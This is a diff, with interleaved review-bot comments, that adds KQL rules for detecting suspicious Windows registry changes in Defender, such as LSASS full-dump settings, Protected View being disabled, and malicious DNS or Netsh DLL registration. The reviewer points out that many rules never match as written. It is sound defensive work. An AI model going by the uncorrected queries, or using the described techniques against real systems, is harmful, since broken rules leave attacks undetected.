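Review bot: In ie_change_domain_zone.kql `RegistryKey endswith "...\\ZoneMap\\Domains*"` takes the `*` literally, so the rule can never match; the Sigma wildcard means `RegistryKey contains "\\Internet Settings\\ZoneMap\\Domains\\"`. The exclusion list `("DWORD (0x00000000)", "DWORD (0x00000001)", "(Empty)")` is Sysmon formatting and excludes nothing in Defender, which reports the data as `0`, `1` or an empty string, so once the key test is fixed every zone assignment would alert; change it to `not(RegistryValueData in ("0", "1") or isempty(RegistryValueData))`. The `Description` line ("Hides the file extension through modification of the registry") does not describe this rule and looks copied from another one; a one-line correction such as `Detects changes under ZoneMap\Domains that assign a domain to a different IE security zone` would help the analyst who receives the alert.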
diff --git a/KQL/rules/windows/registry/registry_set/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql b/KQL/rules/windows/registry/registry_set/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql
new file mode 100644
index 00000000..c0dc15c6
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql
@@ -0,0 +1,10 @@
+// Title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols
+// Author: Nasreddine Bencherchali (Nextron Systems), Michael Haag (idea)
+// Date: 2023-09-05
+// Level: high
+// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceRegistryEvents
+| where RegistryValueData contains "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and (RegistryKey endswith "\\http" or RegistryKey endswith "\\https")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/internet_explorer_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/internet_explorer_autorun_keys_modification.kql
new file mode 100644
index 00000000..9a64e30d
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/internet_explorer_autorun_keys_modification.kql
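Review bot: `RegistryKey endswith "\\http"` / `"\\https"` cannot match because `http` and `https` are value names under `ProtocolDefaults`, which Defender reports in `RegistryValueName`, so this `high` rule is silent as written. Suggest `| where RegistryKey endswith "\\Internet Settings\\ZoneMap\\ProtocolDefaults" and RegistryValueName in~ ("http", "https") and RegistryValueData == "0"`, which also drops the Sysmon-formatted `contains "DWORD (0x00000000)"` test that Defender data will not satisfy.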
@@ -0,0 +1,13 @@
+// Title: Internet Explorer Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Internet Explorer" or RegistryKey contains "\\Software\\Microsoft\\Internet Explorer") and (RegistryKey contains "\\Toolbar" or RegistryKey contains "\\Extensions" or RegistryKey contains "\\Explorer Bars") and (not((RegistryValueData =~ "(Empty)" or (RegistryKey contains "\\Extensions\\{2670000A-7350-4f3c-8081-5663EE0C6C49}" or RegistryKey contains "\\Extensions\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}" or RegistryKey contains "\\Extensions\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}" or RegistryKey contains "\\Extensions\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}") or (RegistryKey endswith "\\Toolbar\\ShellBrowser\\ITBar7Layout" or RegistryKey endswith "\\Toolbar\\ShowDiscussionButton" or RegistryKey endswith "\\Toolbar\\Locked"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/internet_explorer_disablefirstruncustomize_enabled.kql b/KQL/rules/windows/registry/registry_set/internet_explorer_disablefirstruncustomize_enabled.kql
new file mode 100644
index 00000000..c7a3d5df
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/internet_explorer_disablefirstruncustomize_enabled.kql
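Review bot: The `RegistryValueData =~ "(Empty)"` exclusion is Sysmon's placeholder for empty data; Defender reports empty data as an empty string, so this filter should be `isempty(RegistryValueData)` or the rule alerts on every value deletion or empty write under these keys. The three `RegistryKey endswith "\\Toolbar\\..."` exclusions name values (`ITBar7Layout`, `ShowDiscussionButton`, `Locked`) that Defender reports in `RegistryValueName`, so they never apply and those known-benign writes are not filtered; express them as `(RegistryKey endswith "\\Toolbar" or RegistryKey endswith "\\Toolbar\\ShellBrowser") and RegistryValueName in~ ("ITBar7Layout", "ShowDiscussionButton", "Locked")`. The GUID exclusions use `contains` on the key path and are fine as they stand.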
@@ -0,0 +1,12 @@
+// Title: Internet Explorer DisableFirstRunCustomize Enabled
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-16
+// Level: medium
+// Description: Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - As this is controlled by group policy as well as user settings. Some false positives may occur.
+
+DeviceRegistryEvents
+| where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Microsoft\\Internet Explorer\\Main\\DisableFirstRunCustomize") and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\ie4uinit.exe")))) and (not(((RegistryValueData contains "DWORD (0x00000001)" and (InitiatingProcessFolderPath contains "\\Temp\\" and InitiatingProcessFolderPath contains "\\.cr\\avira_")) or (RegistryValueData contains "DWORD (0x00000001)" and (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Foxit Software\\Foxit PDF Reader\\FoxitPDFReader.exe", "C:\\Program Files\\Foxit Software\\Foxit PDF Reader\\FoxitPDFReader.exe"))))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql b/KQL/rules/windows/registry/registry_set/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql
new file mode 100644
index 00000000..cd2f98f8
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql
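Review bot: `RegistryKey endswith "\\Microsoft\\Internet Explorer\\Main\\DisableFirstRunCustomize"` names a value rather than a key, so it never matches a Defender event and the rule is dead; it should read `RegistryKey endswith "\\Microsoft\\Internet Explorer\\Main" and RegistryValueName =~ "DisableFirstRunCustomize"`. The `in~ ("DWORD (0x00000001)", "DWORD (0x00000002)")` test and the two `contains "DWORD (0x00000001)"` exclusions likewise need the plain `"1"` / `"2"` values, otherwise the Avira and Foxit filters stop applying once the key test is repaired.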
@@ -0,0 +1,11 @@
+// Title: Lolbas OneDriveStandaloneUpdater.exe Proxy Download
+// Author: frack113
+// Date: 2022-05-28
+// Level: high
+// Description: Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any
+// anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\SOFTWARE\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/lsass_full_dump_request_via_dumptype_registry_settings.kql b/KQL/rules/windows/registry/registry_set/lsass_full_dump_request_via_dumptype_registry_settings.kql
new file mode 100644
index 00000000..ed914fe8
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/lsass_full_dump_request_via_dumptype_registry_settings.kql
@@ -0,0 +1,12 @@
+// Title: Lsass Full Dump Request Via DumpType Registry Settings
+// Author: @pbssubhash
+// Date: 2022-12-08
+// Level: high
+// Description: Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Legitimate application that needs to do a full dump of their process
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000002)" and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\lsass.exe\\DumpType")
\ No newline at end of file
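Review bot: `RegistryKey contains "...\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC"` will not match because `UpdateRingSettingURLFromOC` is a value name, which Defender reports in `RegistryValueName`, so this `high` rule never fires. Suggest `| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\OneDrive\\UpdateOfficeConfig" and RegistryValueName =~ "UpdateRingSettingURLFromOC"`. The URL being set is then available in `RegistryValueData`, which is worth surfacing in the alert since it is the download source an analyst will want first.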
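Review bot: In lsass_full_dump_request_via_dumptype_registry_settings.kql both `RegistryKey contains` tests end in the value name `DumpType`, so neither matches a Defender event and this `high` rule is dead. Rewrite as `| where RegistryValueName =~ "DumpType" and RegistryValueData == "2" and (RegistryKey endswith "\\Windows Error Reporting\\LocalDumps" or RegistryKey endswith "\\LocalDumps\\lsass.exe")`. Note the first branch fires on the global WER full-dump setting for any process, not just LSASS, which is what the listed false positive is about; a per-process `LocalDumps\\<exe>` key other than `lsass.exe` is deliberately not covered.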
diff --git a/KQL/rules/windows/registry/registry_set/macro_enabled_in_a_potentially_suspicious_document.kql b/KQL/rules/windows/registry/registry_set/macro_enabled_in_a_potentially_suspicious_document.kql
new file mode 100644
index 00000000..0ca5d1c7
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/macro_enabled_in_a_potentially_suspicious_document.kql
@@ -0,0 +1,12 @@
+// Title: Macro Enabled In A Potentially Suspicious Document
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-21
+// Level: high
+// Description: Detects registry changes to Office trust records where the path is located in a potentially suspicious location
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryKey contains "/AppData/Local/Microsoft/Windows/INetCache/" or RegistryKey contains "/AppData/Local/Temp/" or RegistryKey contains "/PerfLogs/" or RegistryKey contains "C:/Users/Public/" or RegistryKey contains "file:///D:/" or RegistryKey contains "file:///E:/") and RegistryKey contains "\\Security\\Trusted Documents\\TrustRecords"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/maxmpxct_registry_value_changed.kql b/KQL/rules/windows/registry/registry_set/maxmpxct_registry_value_changed.kql
new file mode 100644
index 00000000..90821ff7
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/maxmpxct_registry_value_changed.kql
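Review bot: The `file:///...` document paths this rule keys on are the TrustRecords value names, which Defender reports in `RegistryValueName`, so the six `RegistryKey contains "/AppData/Local/Temp/"`-style tests never match and the `high` rule is silent. Change those tests to `RegistryValueName contains ...` and keep `RegistryKey endswith "\\Security\\Trusted Documents\\TrustRecords"` as the key anchor. The forward-slash and `C:/Users/Public/` spellings are correct for URI-form value names and should be kept as they are.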
@@ -0,0 +1,12 @@
+// Title: MaxMpxCt Registry Value Changed
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-03-19
+// Level: low
+// Description: Detects changes to the "MaxMpxCt" registry value.
+// MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate.
+// Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.005
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Services\\LanmanServer\\Parameters\\MaxMpxCt"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/microsoft_office_protected_view_disabled.kql b/KQL/rules/windows/registry/registry_set/microsoft_office_protected_view_disabled.kql
new file mode 100644
index 00000000..88fbf6f7
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/microsoft_office_protected_view_disabled.kql
@@ -0,0 +1,12 @@
+// Title: Microsoft Office Protected View Disabled
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-06-08
+// Level: high
+// Description: Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*" and RegistryKey endswith "\\Security\\ProtectedView*") and ((RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\enabledatabasefileprotectedview" or RegistryKey endswith "\\enableforeigntextfileprotectedview")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\DisableAttachementsInPV" or RegistryKey endswith "\\DisableInternetFilesInPV" or RegistryKey endswith "\\DisableIntranetCheck" or RegistryKey endswith "\\DisableUnsafeLocationsInPV")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/modification_of_ie_registry_settings.kql b/KQL/rules/windows/registry/registry_set/modification_of_ie_registry_settings.kql
new file mode 100644
index 00000000..8711bbf5
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/modification_of_ie_registry_settings.kql
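Review bot: `RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*" and RegistryKey endswith "\\Security\\ProtectedView*"` is two `endswith` tests on the same field, each ending in a literal `*`, so the conjunction is always false and this `high` rule never fires. The inner `endswith` tests also name values rather than keys. A working form is `| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Office\\" and RegistryKey endswith "\\Security\\ProtectedView" and ((RegistryValueData == "0" and RegistryValueName in~ ("enabledatabasefileprotectedview", "enableforeigntextfileprotectedview")) or (RegistryValueData == "1" and RegistryValueName in~ ("DisableAttachementsInPV", "DisableInternetFilesInPV", "DisableIntranetCheck", "DisableUnsafeLocationsInPV")))`.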
@@ -0,0 +1,10 @@
+// Title: Modification of IE Registry Settings
+// Author: frack113
+// Date: 2022-01-22
+// Level: low
+// Description: Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert JavaScript for persistence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" and (not((RegistryValueData =~ "Binary Data" or RegistryValueData startswith "DWORD" or isnull(RegistryValueData) or (RegistryValueData in~ ("Cookie:", "Visited:", "(Empty)")) or (RegistryKey contains "\\Cache" or RegistryKey contains "\\ZoneMap" or RegistryKey contains "\\WpadDecision")))) and (not(RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Accepted Documents"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/modify_user_shell_folders_startup_value.kql b/KQL/rules/windows/registry/registry_set/modify_user_shell_folders_startup_value.kql
new file mode 100644
index 00000000..471f25b9
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/modify_user_shell_folders_startup_value.kql
@@ -0,0 +1,10 @@
+// Title: Modify User Shell Folders Startup Value
+// Author: frack113
+// Date: 2022-10-01
+// Level: high
+// Description: Detect modification of the startup key to a path where a payload could be stored to be launched during startup
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1547.001
+
+DeviceRegistryEvents
+| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" and RegistryKey endswith "Startup"
\ No newline at end of file
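Review bot: The `RegistryValueData startswith "DWORD"` and `=~ "Binary Data"` exclusions are Sysmon renderings that exclude nothing in Defender, so this `low` rule will fire on every DWORD and binary write under `Internet Settings` instead of only string values as the original intends. Filter on the type column instead, e.g. `RegistryValueType in~ ("Dword", "Binary")` (confirm the exact type strings on a live event), and replace `"(Empty)"` in the `in~` list with an `isempty(RegistryValueData)` test alongside the existing `isnull`.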
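Review bot: In modify_user_shell_folders_startup_value.kql, `Startup` and `Common Startup` are values under `User Shell Folders`, so `RegistryKey endswith "Startup"` never matches a Defender event and this `high` rule is dead. Use `| where RegistryKey endswith "\\Explorer\\User Shell Folders" and RegistryValueName endswith "Startup"`, which keeps the original's coverage of both value names; the new folder path is then in `RegistryValueData` for the analyst.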
diff --git a/KQL/rules/windows/registry/registry_set/net_ngenassemblyusagelog_registry_key_tamper.kql b/KQL/rules/windows/registry/registry_set/net_ngenassemblyusagelog_registry_key_tamper.kql
new file mode 100644
index 00000000..3d35bef5
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/net_ngenassemblyusagelog_registry_key_tamper.kql
@@ -0,0 +1,12 @@
+// Title: NET NGenAssemblyUsageLog Registry Key Tamper
+// Author: frack113
+// Date: 2022-11-18
+// Level: high
+// Description: Detects changes to the NGenAssemblyUsageLog registry key.
+// .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).
+// By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey endswith "SOFTWARE\\Microsoft\\.NETFramework\\NGenAssemblyUsageLog"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/new_application_in_appcompat.kql b/KQL/rules/windows/registry/registry_set/new_application_in_appcompat.kql
new file mode 100644
index 00000000..f2dc52c1
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/new_application_in_appcompat.kql
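Review bot: `NGenAssemblyUsageLog` is a value name, so `RegistryKey endswith "SOFTWARE\\Microsoft\\.NETFramework\\NGenAssemblyUsageLog"` cannot match a Defender event and this `high` rule is silent. Write it as `| where RegistryKey endswith "SOFTWARE\\Microsoft\\.NETFramework" and RegistryValueName =~ "NGenAssemblyUsageLog"`. The description's "(as described in the next section)" is a leftover from the source blog post and could be dropped from the header comment.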
@@ -0,0 +1,14 @@
+// Title: New Application in AppCompat
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: informational
+// Description: A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+// False Positives:
+// - This rule is to explore new applications on an endpoint. False positives depends on the organization.
+// - Newly setup system.
+// - Legitimate installation of new application.
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\AppCompatFlags\\Compatibility Assistant\\Store*"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_db_path_registry_configuration.kql b/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_db_path_registry_configuration.kql
new file mode 100644
index 00000000..a5a41fc3
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_db_path_registry_configuration.kql
@@ -0,0 +1,12 @@
+// Title: New BgInfo.EXE Custom DB Path Registry Configuration
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-16
+// Level: medium
+// Description: Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate use of external DB to save the results
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Software\\Winternals\\BGInfo\\Database"
\ No newline at end of file
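Review bot: `RegistryKey endswith "\\AppCompatFlags\\Compatibility Assistant\\Store*"` uses `*` literally, so this never matches. The executable paths the Sigma wildcard was reaching for are the value names under that key, so `RegistryKey endswith "\\AppCompatFlags\\Compatibility Assistant\\Store"` is the intended test, with the new application's path then available as `RegistryValueName`.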
diff --git a/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_vbscript_registry_configuration.kql b/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_vbscript_registry_configuration.kql
new file mode 100644
index 00000000..13bb63f2
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_vbscript_registry_configuration.kql
@@ -0,0 +1,12 @@
+// Title: New BgInfo.EXE Custom VBScript Registry Configuration
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-16
+// Level: medium
+// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate VBScript
+
+DeviceRegistryEvents
+| where RegistryValueData startswith "4" and RegistryKey endswith "\\Software\\Winternals\\BGInfo\\UserFields*"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_wmi_query_registry_configuration.kql b/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_wmi_query_registry_configuration.kql
new file mode 100644
index 00000000..95e12749
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_wmi_query_registry_configuration.kql
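Review bot: `RegistryKey endswith "\\Software\\Winternals\\BGInfo\\UserFields*"` takes the `*` literally and never matches; the Sigma wildcard means `RegistryKey endswith "\\Software\\Winternals\\BGInfo\\UserFields"`, with the custom field's name arriving in `RegistryValueName`. `RegistryValueData startswith "4"` is the upstream type-code heuristic and will also match any field whose data merely begins with the digit 4, so some noise is expected once the key test works; the sibling WMI rule in this commit has the identical `UserFields*` problem.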
@@ -0,0 +1,12 @@
+// Title: New BgInfo.EXE Custom WMI Query Registry Configuration
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-16
+// Level: medium
+// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate WMI query
+
+DeviceRegistryEvents
+| where RegistryValueData startswith "6" and RegistryKey endswith "\\Software\\Winternals\\BGInfo\\UserFields*"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/new_dns_serverlevelplugindll_installed.kql b/KQL/rules/windows/registry/registry_set/new_dns_serverlevelplugindll_installed.kql
new file mode 100644
index 00000000..f3678c83
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/new_dns_serverlevelplugindll_installed.kql
@@ -0,0 +1,10 @@
+// Title: New DNS ServerLevelPluginDll Installed
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-05-08
+// Level: high
+// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\services\\DNS\\Parameters\\ServerLevelPluginDll"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/new_file_association_using_exefile.kql b/KQL/rules/windows/registry/registry_set/new_file_association_using_exefile.kql
new file mode 100644
index 00000000..db6a3359
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/new_file_association_using_exefile.kql
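Review bot: In new_dns_serverlevelplugindll_installed.kql, `ServerLevelPluginDll` is a value under `DNS\\Parameters`, so `RegistryKey endswith "\\services\\DNS\\Parameters\\ServerLevelPluginDll"` never matches a Defender event and this `high` rule on a domain-controller persistence technique is silent. Use `| where RegistryKey endswith "\\services\\DNS\\Parameters" and RegistryValueName =~ "ServerLevelPluginDll"`. Adding `and isnotempty(RegistryValueData)` would keep the rule from alerting when the value is cleared during remediation, if that matches the intended scope.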
@@ -0,0 +1,10 @@
+// Title: New File Association Using Exefile
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2021-11-19
+// Level: high
+// Description: Detects the abuse of the exefile handler in new file association. Used for bypass of security products.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "exefile" and RegistryKey contains "Classes\\."
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/new_netsh_helper_dll_registered_from_a_suspicious_location.kql b/KQL/rules/windows/registry/registry_set/new_netsh_helper_dll_registered_from_a_suspicious_location.kql
new file mode 100644
index 00000000..e4204067
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/new_netsh_helper_dll_registered_from_a_suspicious_location.kql
@@ -0,0 +1,10 @@
+// Title: New Netsh Helper DLL Registered From A Suspicious Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-11-28
+// Level: high
+// Description: Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\SOFTWARE\\Microsoft\\NetSh" and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Temporary Internet") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Pictures\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/new_odbc_driver_registered.kql b/KQL/rules/windows/registry/registry_set/new_odbc_driver_registered.kql
new file mode 100644
index 00000000..d0f4d9c8
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/new_odbc_driver_registered.kql
@@ -0,0 +1,12 @@
+// Title: New ODBC Driver Registered
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-23
+// Level: low
+// Description: Detects the registration of a new ODBC driver.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Likely
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\SOFTWARE\\ODBC\\ODBCINST.INI*" and RegistryKey endswith "\\Driver") and (not((RegistryValueData =~ "%WINDIR%\\System32\\SQLSRV32.dll" and RegistryKey endswith "\\SQL Server*"))) and (not(((RegistryValueData endswith "\\ACEODBC.DLL" and RegistryValueData startswith "C:\\Progra" and RegistryKey contains "\\Microsoft Access ") or (RegistryValueData endswith "\\ACEODBC.DLL" and RegistryValueData startswith "C:\\Progra" and RegistryKey contains "\\Microsoft Excel Driver"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/new_root_or_ca_or_authroot_certificate_to_store.kql b/KQL/rules/windows/registry/registry_set/new_root_or_ca_or_authroot_certificate_to_store.kql
new file mode 100644
index 00000000..44a79c6c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/new_root_or_ca_or_authroot_certificate_to_store.kql
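Review bot: `RegistryKey endswith "\\SOFTWARE\\ODBC\\ODBCINST.INI*" and RegistryKey endswith "\\Driver"` is two `endswith` tests on one field, the first with a literal `*`, so the rule is always false. `Driver` is the value name, so the working form is `RegistryKey contains "\\SOFTWARE\\ODBC\\ODBCINST.INI\\" and RegistryValueName =~ "Driver"`, and the SQL Server exclusion's `RegistryKey endswith "\\SQL Server*"` should become `RegistryKey endswith "\\SQL Server"`. The two ACEODBC exclusions use `contains` on the key and `RegistryValueData` and are fine as written.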
@@ -0,0 +1,10 @@
+// Title: New Root or CA or AuthRoot Certificate to Store
+// Author: frack113
+// Date: 2022-04-04
+// Level: medium
+// Description: Detects the addition of new root, CA or AuthRoot certificates to the Windows registry
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+
+DeviceRegistryEvents
